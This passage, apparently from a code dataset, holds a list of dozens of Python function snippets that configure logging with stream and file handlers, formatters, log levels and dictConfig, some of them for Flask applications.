self.INFO_LEVEL: logging.INFO,\r\n self.DEBUG_LEVEL: logging.DEBUG,\r\n }.get(self.options.verbose_level, logging.DEBUG)\r\n console.setLevel(console_level)\r\n if logging.DEBUG == console_level:\r\n formatter = logging.Formatter(self.DEBUG_MESSAGE_FORMAT)\r\n else:\r\n formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)\r\n console.setFormatter(formatter)\r\n root_logger.addHandler(console)\r\n return", "def _begin_logging(self):\n logconf.set_up_root_logger(self.opts.logfile)", "def initialize_logging():\n\n print 'Setting up logging...'\n\n log_level = app.config['LOGGING_LEVEL']\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.info('Logging handler established')", "def init_logs(self):\n\n handler = logging.FileHandler(self.app.config['LOG'])\n handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))\n self.app.logger.addHandler(handler)\n if self.app.config.get(\"LOG_LEVEL\") == \"DEBUG\":\n self.app.logger.setLevel(logging.DEBUG)\n elif self.app.config.get(\"LOG_LEVEL\") == \"WARN\":\n self.app.logger.setLevel(logging.WARN)\n else:\n self.app.logger.setLevel(logging.INFO)\n self.app.logger.info('Startup with log: %s' % self.app.config['LOG'])", "def configure_logging():\n # console_handler = TTSHandler()\n root = logging.getLogger('node_' + __name__)\n root.setLevel(logging.INFO)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n console_handler.setFormatter(formatter)\n root.addHandler(console_handler)\n\n root = logging.getLogger()\n root.addHandler(console_handler)\n # the default formatter just returns the message\n root.setLevel(logging.DEBUG)", "def log_setup(self):\n # Logger initialisation\n logger = logging.getLogger(self.app_name)\n logger.setLevel(logging.DEBUG)\n\n # Creating console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # Creating formatter\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n\n # Adding formatter to ch\n ch.setFormatter(formatter)\n\n # Adding ch to logger\n logger.addHandler(ch)\n\n # Setting the Logger Level (INFO)\n logger.setLevel(logging.INFO)\n\n return logger", "def configure_logging(self):\n root_logger = logging.getLogger('')\n\n # Set up logging to a file\n root_logger.setLevel(logging.DEBUG)\n\n # Send higher-level messages to the console via stderr\n console = logging.StreamHandler(self.stderr)\n console_level = {self.WARNING_LEVEL: logging.WARNING,\n self.INFO_LEVEL: logging.INFO,\n self.DEBUG_LEVEL: logging.DEBUG,\n }.get(self.options.verbose_level, logging.DEBUG)\n # The default log level is INFO, in this situation, set the\n # log level of the console to WARNING, to avoid displaying\n # useless messages. This equals using \"--quiet\"\n if console_level == logging.INFO:\n console.setLevel(logging.WARNING)\n else:\n console.setLevel(console_level)\n if logging.DEBUG == console_level:\n formatter = logging.Formatter(self.DEBUG_MESSAGE_FORMAT)\n else:\n formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)\n logging.getLogger('iso8601.iso8601').setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n console.setFormatter(formatter)\n root_logger.addHandler(console)\n return", "def initLogging(self):\n logging.basicConfig(level=self.loglevel, stream=sys.stderr)", "def configure_console_logger ():\n\t\tconsole = logging.StreamHandler()\n\t\tconsole.setLevel(logging.INFO) # Change level for console logger in development mode\n\t\tformatter = logging.Formatter('%(levelname)-8s %(message)s')\n\t\tconsole.setFormatter(formatter)\n\t\tlogging.getLogger('').addHandler(console)", "def setup_logger() -> None:\n LOGGER.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s \\t|%(asctime)s \\t| %(name)s \\t| %(message)s')\n\n if not check_if_dir_exists(FILENAMES.LOG_DIR):\n os.mkdir(to_abs_file_path(FILENAMES.LOG_DIR))\n\n file_handler: logging.FileHandler = logging.FileHandler(to_abs_file_path(FILENAMES.LOG), mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n\n console_handler: logging.StreamHandler = logging.StreamHandler()\n console_handler.setLevel(logging.WARNING)\n\n LOGGER.addHandler(file_handler)\n LOGGER.addHandler(console_handler)\n LOGGER.info('Filehandler and Console_Handler were born, let\\'s start logging')", "def setup_logging():\n logger = logging.getLogger()\n logger.level = logging.DEBUG\n stream_handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(stream_handler)", "def init_logger():\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(f'[%(asctime)s] %(name)s level=%(levelname)s %(filename)s:%(lineno)d \"%(message)s\"')\n handler = logging.StreamHandler()\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n root_logger.addHandler(handler)\n\n # Silencing the noisy Kafka logger\n kafka_logger = logging.getLogger('kafka')\n kafka_logger.setLevel(logging.ERROR)", "def setup_logging(self):\n console_handler = logging.StreamHandler()\n request_logging.assign_request_filter(console_handler,\n self.additional_fields)\n logging.basicConfig(level=self.level,\n format=self.format_string,\n handlers=[console_handler])\n for handler in logging.root.handlers:\n handler.setFormatter(RedactionFormatter(handler.formatter))\n logger = logging.getLogger(__name__)\n logger.info('Established logging defaults')\n self._setup_log_levels()", "def configure(cls):\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger_handler = logging.StreamHandler()\n logger.addHandler(logger_handler)\n logger_handler.setFormatter(logging.Formatter('%(message)s'))\n cls.logger = logger", "def initialize_root_logger(log_level=INFO):\n formatter = Formatter(LOGGING_FORMAT)\n\n console_handler = StreamHandler()\n console_handler.setFormatter(formatter)\n\n root_logger = getLogger(__name__)\n root_logger.setLevel(log_level)\n root_logger.addHandler(console_handler)\n\n return root_logger", "def setup_logger():\n mc_logger = logging.getLogger('chess_logger')\n mc_logger.setLevel(logging.DEBUG)\n console_handler = logging.StreamHandler()\n formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n console_handler.setFormatter(formatter)\n mc_logger.addHandler(console_handler)", "def init() -> None:\n log_format = logging.Formatter(\"%(levelname)s || %(name)s || %(asctime)s || %(message)s\")\n\n log_file = Path(\"logs\", \"rl_snake.log\")\n log_file.parent.mkdir(exist_ok=True)\n\n file_handler = handlers.RotatingFileHandler(\n log_file,\n maxBytes=3000000,\n backupCount=5\n )\n file_handler.setFormatter(log_format)\n\n root_logger = logging.getLogger()\n root_logger.addHandler(file_handler)\n root_logger.setLevel(logging.DEBUG if constants.Misc.debug else logging.INFO)\n\n root_logger.info(\"Root logger initilised\")", "def setup_class(cls):\n if os.path.exists(logfilename):\n os.remove(logfilename)\n log = logutils.get_logger(__name__)\n log.root.handlers = []\n logutils.config(mode='standard', console_lvl='stdinfo',\n file_name=logfilename)", "def configure_logger():\n logger = logging.getLogger()\n handler = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)", "def setup_logging():\n logging.basicConfig(format='%(levelname)s: %(message)s', level=LOGLEVEL)", "def initialize_logging(log_level=logging.INFO):\n if not app.debug:\n print 'Setting up logging...'\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.info('Logging handler established')", "def init_logging():\n\n logger = logging.getLogger()\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)", "def _setup_default_logger(self):\n #print(f\"setup default logger is called by {self}\")\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter(\n '%(process)d-%(levelname)s-%(asctime)s.%(msecs)02d-%(message)s',\n datefmt='%Y-%m-%d,%H:%M:%S'))\n self.logger.addHandler(stream_handler)\n self.logger.propagate = True # don't propagate to the root logger! ", "def initialize_logging(log_level=logging.INFO):\n if not app.debug:\n print('Setting up logging...')\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.info('Logging handler established')", "def initialize_logging(log_level=logging.INFO):\n if not app.debug:\n print('Setting up logging...')\n\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.propagate = False\n app.logger.info('Logging handler established')", "def setupLogger():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='prepareToSubmit.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def _setup_logging(self):\n if self.app_config_has(\"logging\"):\n log_config = self.app_config()[\"logging\"]\n filename_list = [\n v['filename'] for k, v in\n _find_config_tree(log_config, \"filename\")\n ]\n # pre-create directory in advance for all loggers\n for file in filename_list:\n file_dir = os.path.dirname(file)\n if file_dir and not os.path.isdir(file_dir):\n os.makedirs(file_dir, exist_ok=True)\n dictConfig(log_config)\n else:\n log = getLogger()\n handler = StreamHandler()\n formatter = Formatter(\n \"%(asctime)s-%(threadName)s-%(name)s-%(levelname)s-%(message)s\"\n )\n handler.setFormatter(formatter)\n log.addHandler(handler)\n log.setLevel(DEBUG)\n msg = (\"Starting \" + os.path.basename(__name__) +\n \" version \" + __version__ + \" on \" +\n \"_\".join(uname()).replace(\" \", \"_\"))\n logger = getLogger(__name__)\n logger.debug(msg)", "def setup():\n config['global']['log.access_file'] = ''\n config['global']['log.error_file'] = ''\n config['global']['log.screen'] = False\n log_level = getattr(logging, config.log_level)\n logging.root.setLevel(logging.NOTSET)\n file_log.setLevel(log_level)\n logging.root.addHandler(file_log)\n if config.log_screen:\n console_log.setLevel(log_level)\n logging.root.addHandler(console_log)", "def init_logs() -> None:\n logging.basicConfig(\n filename=\"logs.txt\",\n filemode=\"w\",\n format=\"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\",\n level=logging.ERROR,\n )\n\n formatter = logging.Formatter(\n \"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\"\n )\n\n global logger\n logger = logging.getLogger(__name__)\n\n # simlogger = logging.getLogger(\"netsquid\")\n # simlogger.setLevel(logging.DEBUG)\n # fhandler = logging.FileHandler(\"simlogs.txt\", mode=\"w\")\n # fhandler.setFormatter(formatter)\n # simlogger.addHandler(fhandler)\n\n # shandler = logging.StreamHandler(stream=sys.stdout)\n # shandler.setLevel(logging.ERROR)\n # shandler.setFormatter(formatter)\n # simlogger.addHandler(shandler)", "def initLogger(self):\n loglevel = self.loglevels[self.loglevel]\n log_format = '%(asctime)s name=%(name)s loglevel=%(levelname)s message=%(message)s'\n logging.basicConfig(format=log_format,\n level=loglevel)\n \tmultiprocessing.log_to_stderr(loglevel)", "def setup_logging(options):\n root_logger = logging.getLogger()\n add_stdout = False\n\n formatter = logging.Formatter(\"%(asctime)s %(levelname)-5.5s %(message)s\")\n\n # Write out to a logfile\n if options.logfile:\n handler = logging.FileHandler(options.logfile, mode=\"w\")\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n root_logger.addHandler(handler)\n else:\n # The logfile wasn't specified. Add a stdout logger.\n add_stdout = True\n\n if options.verbose:\n # Add a stdout logger as well in verbose mode\n root_logger.setLevel(logging.DEBUG)\n add_stdout = True\n else:\n root_logger.setLevel(logging.INFO)\n\n if add_stdout:\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(logging.DEBUG)\n root_logger.addHandler(stdout_handler)", "def setup_logging():\n formatter = logging.Formatter(LOG_FORMAT)\n level = logging.INFO\n\n file_handler = logging.FileHandler('db.log')\n file_handler.setFormatter(formatter)\n file_handler.setLevel(level)\n\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n console_handler.setLevel(level)\n\n logger = logging.getLogger()\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n logger.setLevel(level)", "def setup_logging():\n product_name = \"plasma\"\n logging.setup(cfg.CONF, product_name)\n LOG.info(\"Logging enabled!\")\n LOG.debug(\"command line: %s\", \" \".join(sys.argv))", "def _instanciate_logger(self):\n\t\tself._logger = logging.getLogger('main')\n\t\tself._logger.setLevel(logging.DEBUG)\n\t\tself._logger.addHandler(logging.StreamHandler())", "def initialize_log():\n logging.basicConfig(\n format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S',\n )", "def setup_logging():\n log.setup('keystone')", "def test_root_logger_config(self):\n with debug_env:\n logging.config.dictConfig(django12factor.factorise()[\"LOGGING\"])\n self.assertTrue(has_handler(logging.root, \"stdout\"))", "def setup_logging():\n lvl = os.getenv(\"LOG_LEVEL\")\n path = os.getenv(\"LOG_PATH\")\n\n logger = get_logger()\n logger.setLevel(lvl)\n\n filehandler = logging.FileHandler(path)\n filehandler.setLevel(lvl)\n filehandler.setFormatter(logging.Formatter(\n \"[%(asctime)s] %(levelname)s: %(message)s\",\n datefmt=\"%Y-%d-%m %H:%M:%S\"\n ))\n\n streamhandler = logging.StreamHandler()\n streamhandler.setLevel(lvl)\n streamhandler.setFormatter(logging.Formatter(\"%(message)s\"))\n\n logger.addHandler(filehandler)\n logger.addHandler(streamhandler)", "def setup_logging():\n\n coloredlogs.install(\n level=DEBUG, fmt=\"%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s\"\n )", "def setup_logging():\n if not app.debug:\n if app.config.get('LOG_CFG'):\n # initialize the Flask logger (removes all handlers)\n _ = app.logger\n dictConfig(app.config.get('LOG_CFG'))\n else:\n # capability with previous config settings\n # Should have LOG_FILE and LOG_LEVEL set\n if app.config.get('LOG_FILE') is not None:\n handler = RotatingFileHandler(app.config.get('LOG_FILE'), maxBytes=10000000, backupCount=100)\n else:\n handler = StreamHandler(stream=sys.stderr)\n\n handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s '\n '[in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(app.config.get('LOG_LEVEL', DEBUG))\n app.logger.addHandler(handler)", "def loggerSetup(logLevel=logging.INFO):\n logger = logging.getLogger(__name__)\n outHandler = logging.StreamHandler(sys.stdout)\n outHandler.setFormatter(logging.Formatter(\"%(asctime)s:%(levelname)s:%(module)s: %(message)s\"))\n outHandler.setLevel(logLevel)\n logger.addHandler(outHandler)\n logger.setLevel(logLevel)\n return logger", "def _setup_logging():\n logging.Formatter.converter = time.gmtime\n logging.basicConfig(\n format='%(asctime)s %(message)s',\n level=logging.DEBUG,\n filename='conduit-proxy.log')\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n logging.getLogger().addHandler(console)", "def setup_logging(loglevel=logging.INFO):\n\n root = logging.getLogger(__name__)\n root.setLevel(loglevel)\n ch = logging.StreamHandler(sys.stderr)\n ch.setLevel(loglevel)\n formatter = logging.Formatter('[%(asctime)s] %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n root.propagate = False", "def __logger_console(self):\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(self.__formatter)\n console_handler.setLevel(logging.INFO)\n self.__logger.addHandler(console_handler)", "def start_logging() -> logging.RootLogger:\r\n # Defines the format of the logged messages.\r\n log_format = \"%(levelname)s | %(asctime)s | %(message)s\"\r\n # Configures logging, logs all messages >= 20 (INFO).\r\n logging.basicConfig(filename=app.config[\"log_file_name\"],\r\n format=log_format,\r\n level=logging.INFO)\r\n # Handle on the logger.\r\n logger = logging.getLogger()\r\n return logger", "def setupLogging(self):\n\t\ttry:\n\t\t\tself.logger = logging.getLogger(__name__)\n\t\t\thandler = RotatingFileHandler(self.logFile, maxBytes=500000, backupCount=5)\n\t\t\tformat = \"%(asctime)s %(levelname)-8s %(message)s\"\n\t\t\thandler.setFormatter(logging.Formatter(format))\n\t\t\thandler.setLevel(logging.INFO)\n\t\t\tself.logger.addHandler(handler)\n\t\t\tself.logger.setLevel(logging.INFO)\n\t\texcept Exception as err:\n\t\t\terrorStr = 'Error initializing log file, ',err\n\t\t\tprint(errorStr)\n\t\t\texit(1)", "def setup_logger(self):\n setup_logger(logger, 'mayavi.log', mode=self.log_mode)", "def setup_logging():\n for name, logger in loggers.items():\n logger.setLevel(LOGGING_MAPPING.get(options.logging, logging.DEBUG))\n handler = logging.FileHandler(\n getattr(options, '{}_log_file_path'.format(name))\n )\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)", "def configure():\n # TODO: Simple configuration of what to log and where to log it to\n level_name = getenv(\"LOGLEVEL\", \"INFO\")\n level = getattr(logging, level_name)\n logging.basicConfig(stream=sys.stdout, filemode=\"w\", level=level)\n\n for handler in logging.root.handlers:\n handler.addFilter(Whitelist(\"mara\", \"tests\"))", "def setup_logging(log_dir: Optional[str] = None) -> None:\n config: Dict[str, Any] = {\n \"version\": 1,\n \"disable_existing_loggers\": True,\n \"formatters\": {\"console\": {\"format\": \"%(asctime)s:\\t%(message)s\"}},\n \"handlers\": {\n \"console\": {\n \"level\": \"WARNING\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"console\",\n \"stream\": \"ext://sys.stdout\",\n }\n },\n \"loggers\": {\n LOG_NAME: {\"handlers\": [\"console\"], \"level\": \"DEBUG\", \"propagate\": False}\n },\n }\n if log_dir is not None:\n config[\"loggers\"][LOG_NAME][\"handlers\"].append(\"file\")\n config[\"formatters\"][\"file\"] = {\n \"format\": \"%(asctime)s - %(levelname)s - %(name)s - %(message)s\"\n }\n config[\"handlers\"][\"file\"] = {\n \"level\": \"DEBUG\",\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"formatter\": \"file\",\n \"filename\": os.path.join(log_dir, LOG_NAME + \".log\"),\n \"maxBytes\": 1000000,\n \"backupCount\": 3,\n }\n logging.config.dictConfig(config)", "def init_logger(verbosity):\n # Register our logging handler\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(verbosity)\n rootLogger = logging.getLogger('')\n rootLogger.addHandler(handler)\n\n # Decrease the log level of the root logger if needed\n if verbosity < rootLogger.level:\n rootLogger.setLevel(verbosity)", "def setup_global_logging():\n\n global global_logging_started\n\n if global_logging_started:\n return\n\n orig_logger_class = logging.getLoggerClass()\n logging.setLoggerClass(StreamTeeLogger)\n try:\n stdout_logger = logging.getLogger(__name__ + '.stdout')\n stderr_logger = logging.getLogger(__name__ + '.stderr')\n finally:\n logging.setLoggerClass(orig_logger_class)\n\n stdout_logger.setLevel(logging.INFO)\n stderr_logger.setLevel(logging.ERROR)\n stdout_logger.set_stream(sys.stdout)\n stderr_logger.set_stream(sys.stderr)\n sys.stdout = stdout_logger\n sys.stderr = stderr_logger\n\n exception_logger = logging.getLogger(__name__ + '.exc')\n sys.excepthook = LoggingExceptionHook(exception_logger)\n\n logging.captureWarnings(True)\n\n rawinput = 'input'\n builtins._original_raw_input = getattr(builtins, rawinput)\n setattr(builtins, rawinput, global_logging_raw_input)\n\n global_logging_started = True", "def setup_logger():\n now = datetime.now()\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n logging.info(f\"Script run on: {now}\")", "def init_logger():\n logging.basicConfig(\n stream=sys.stdout,\n level=logging.INFO,\n format='%(asctime)s.%(msecs)03d %(name)s:%(lineno)d %(levelname)s %(message)s',\n datefmt='%m-%d %H:%M:%S',\n )", "def _configure_logging(self):\n pass", "def setup_root_logger(loglevel=logging.DEBUG, logdir=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'Logs'),\n log_config_file=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'Utils', 'cent_logger.json')):\n try:\n\n if not os.path.isdir(logdir):\n os.makedirs(logdir)\n\n if log_config_file is not None and os.path.exists(log_config_file):\n with open(log_config_file, 'rt') as logconf:\n config = json.load(logconf)\n # create absolute path for logfile\n config['handlers']['file_handler']['filename'] = logdir + '/' + config['handlers']['file_handler']['filename']\n config['handlers']['longterm']['filename'] = logdir + '/' + config['handlers']['longterm']['filename']\n config['handlers']['single_run']['filename'] = logdir + '/' + config['handlers']['single_run']['filename']\n root_logger = logging.getLogger(\"framework\")\n logging.config.dictConfig(config)\n logger.info(\"I initialized the framework logger\")\n root_logger.info(\"Configured basic root logger from: {}\".format(log_config_file))\n test_logger = logging.getLogger(\"tests\")\n logging.config.dictConfig(config)\n logger.info(\"I initialized the tests logger\")\n test_logger.info(\"Configured basic tests logger from: {}\".format(log_config_file))\n\n # disable logs from below external modules\n for disabled_module in config['disable_module_logs']:\n root_logger.debug('Disabled logging for module: {}'.format(disabled_module))\n logging.getLogger(disabled_module).disabled = True\n\n except Exception as e:\n print(\"Error configuring logger: {}\".format(e), file=sys.stderr)\n raise e#", "def __setup_logging(self):\n\n loglevel = logging.INFO\n if self.config[\"verbose\"]:\n loglevel = logging.DEBUG\n\n FORMAT = '[%(asctime)s %(filename)s:%(lineno)s %(levelname)s] %(message)s'\n if self.config[\"log\"]:\n logging.basicConfig(format=FORMAT, level=loglevel, filename=self.config[\"log\"])\n else:\n logging.basicConfig(format=FORMAT, level=loglevel)", "def _init_logger(self):\n # Create log directory, if it doesn't already exist.\n self._create_directory(directory=self._log_directory)\n log_filename = \"{0}/{1}.log\".format(self._log_directory, self._program)\n\n # Add the date to the log file names.\n logging.basicConfig(\n filename=log_filename,\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s|%(name)s|%(levelname)-5s| %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S %p')\n\n # define a Handler which writes LOG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n #\n # Note: Anything above the logging level is displayed to stdout.\n #\n # Level Numeric value\n # CRITICAL\t50\n # ERROR \t40\n # WARNING\t30\n # LOG 25 (our log level)\n # INFO\t 20\n # DEBUG \t10\n # NOTSET\t0\n #\n # Add a logging level to always display to stderr.\n logging.addLevelName(self._LOG_LEVEL, self._LOG_NAME)\n if self._debug:\n console.setLevel(logging.DEBUG)\n else:\n console.setLevel(self._LOG_LEVEL)\n # Set a format which is simpler for console use.\n formatter = logging.Formatter('%(name)s|%(levelname)-5s| %(message)s')\n console.setFormatter(formatter)\n # Add the handler to the root logger.\n logging.getLogger('').addHandler(console)\n self._logger = logging.getLogger()", "def init_logging():\n logger.setLevel(logging.DEBUG)\n # set a common log format\n logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n # setup our rotating file handler and assign our common formatter to it\n rotating_file_handler = RotatingFileHandler('my_log.log', maxBytes=200000, backupCount=10)\n rotating_file_handler.setFormatter(logFormatter)\n logger.addHandler(rotating_file_handler)\n \n if DEBUG:\n # print to stdout if we are debugging\n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(logFormatter)\n logger.addHandler(stream_handler)", "def setup_logging(use_syslog=False):\n\n LOG.setLevel(logging.INFO)\n if use_syslog:\n ch = SysLogHandler()\n else:\n ch = logging.StreamHandler(sys.stdout)\n ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] '\n '%(levelname)s: %(message)s'))\n LOG.addHandler(ch)", "def configure_logging():\n\n level = logging.INFO\n logging.getLogger().setLevel(level)\n logging.basicConfig(\n level=level,\n format=(\n \"[%(asctime)s][%(levelname)s][%(filename)s:%(lineno)d]\"\n + \"[%(processName)s] %(message)s\"\n ),\n )", "def _init_logging(self):\n # Setup logging variable\n self.log = logging.getLogger(\"collection-log\")\n self.log.setLevel(logging.INFO)\n self.formatter = logging.Formatter(\"%(asctime)s %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n\n # Log to stdout\n streamhandler = logging.StreamHandler()\n streamhandler.setLevel(logging.INFO)\n streamhandler.setFormatter(self.formatter)\n self.log.addHandler(streamhandler)", "def init_logging():\n global logger\n logger = logging.getLogger('autogen_quartus')", "def set_up_logger(self, logger_name):\n\t\tself.logger = logging.getLogger(logger_name)\n\t\tself.logger.setLevel(logging.INFO)\n\t\tconsole_handler = logging.StreamHandler()\n\t\tfile_handler = logging.FileHandler('main_coordinator.log', 'w+')\n\t\tconsole_handler.setLevel(logging.INFO)\n\t\tfile_handler.setLevel(logging.INFO)\n\t\tconsole_format = logging.Formatter('%(name)s - %(levelname)s - %(message)s')\n\t\tfile_format = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\t\tconsole_handler.setFormatter(console_format)\n\t\tfile_handler.setFormatter(file_format)\n\t\tself.logger.addHandler(console_handler)\n\t\tself.logger.addHandler(file_handler)", "def setup_logger(logLevel=\"DEBUG\"):\n logroot = logging.getLogger(\"c\")\n logroot.propagate = False\n logroot.setLevel(logLevel)\n\n module_console_handler = logging.StreamHandler()\n\n # log_format_module = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n # log_format_module = \"%(name)s - %(levelname)s: %(message)s\"\n # log_format_module = '%(levelname)s: %(message)s'\n log_format_module = \"%(name)s: %(message)s\"\n # log_format_module = \"%(message)s\"\n\n formatter = logging.Formatter(log_format_module)\n module_console_handler.setFormatter(formatter)\n\n logroot.addHandler(module_console_handler)\n\n logging.addLevelName(5, \"TRACE\")\n # use it like this\n # logroot.log(5, 'Exceedingly verbose debug')\n\n # example log line\n logg = logging.getLogger(f\"c.{__name__}.setup_logger\")\n logg.debug(f\"Done setting up logger\")", "def _init_logger(self):\n self.logger = logging.getLogger('WSClientAPILogger')\n self.logger.setLevel(logging.DEBUG)\n self.logger_handler = logging.FileHandler(self.__class__.__name__ + '.log')\n self.logger_handler.setLevel(logging.DEBUG)\n self.logger_formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%d-%m %H:%M:%S')\n self.logger_handler.setFormatter(self.logger_formatter)\n self.logger.addHandler(self.logger_handler)", "def setup():\n global log_handler\n\n if vaex.settings.main.logging.setup:\n logger.setLevel(logging.DEBUG)\n\n # create console handler and accept all loglevels\n if vaex.settings.main.logging.rich:\n from rich.logging import RichHandler\n log_handler = RichHandler()\n else:\n log_handler = logging.StreamHandler()\n\n # create formatter\n formatter = logging.Formatter('%(levelname)s:%(threadName)s:%(name)s:%(message)s')\n\n\n # add formatter to console handler\n log_handler.setFormatter(formatter)\n log_handler.setLevel(logging.DEBUG)\n\n # add console handler to logger\n logger.addHandler(log_handler)\n\n logging.getLogger(\"vaex\").setLevel(logging.ERROR) # default to higest level\n _set_log_level(vaex.settings.main.logging.error, logging.ERROR)\n _set_log_level(vaex.settings.main.logging.warning, logging.WARNING)\n _set_log_level(vaex.settings.main.logging.info, logging.INFO)\n _set_log_level(vaex.settings.main.logging.debug, logging.DEBUG)\n # VAEX_DEBUG behaves similar to VAEX_LOGGING_DEBUG, but has more effect\n DEBUG_MODE = os.environ.get('VAEX_DEBUG', '')\n if DEBUG_MODE:\n _set_log_level(DEBUG_MODE, logging.DEBUG)", "def setup_logfile():\r\n from core.general.appinit import log_init\r\n log_init(\r\n 'general',\r\n 'django_api'\r\n )", "def config_logging():\n\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n \"[%(asctime)s][%(levelname)s] %(name)s %(filename)s:%(funcName)s:%(lineno)d | %(message)s\")\n\n # Enable debug HTTP request/response\n if root_logger.getEffectiveLevel() == 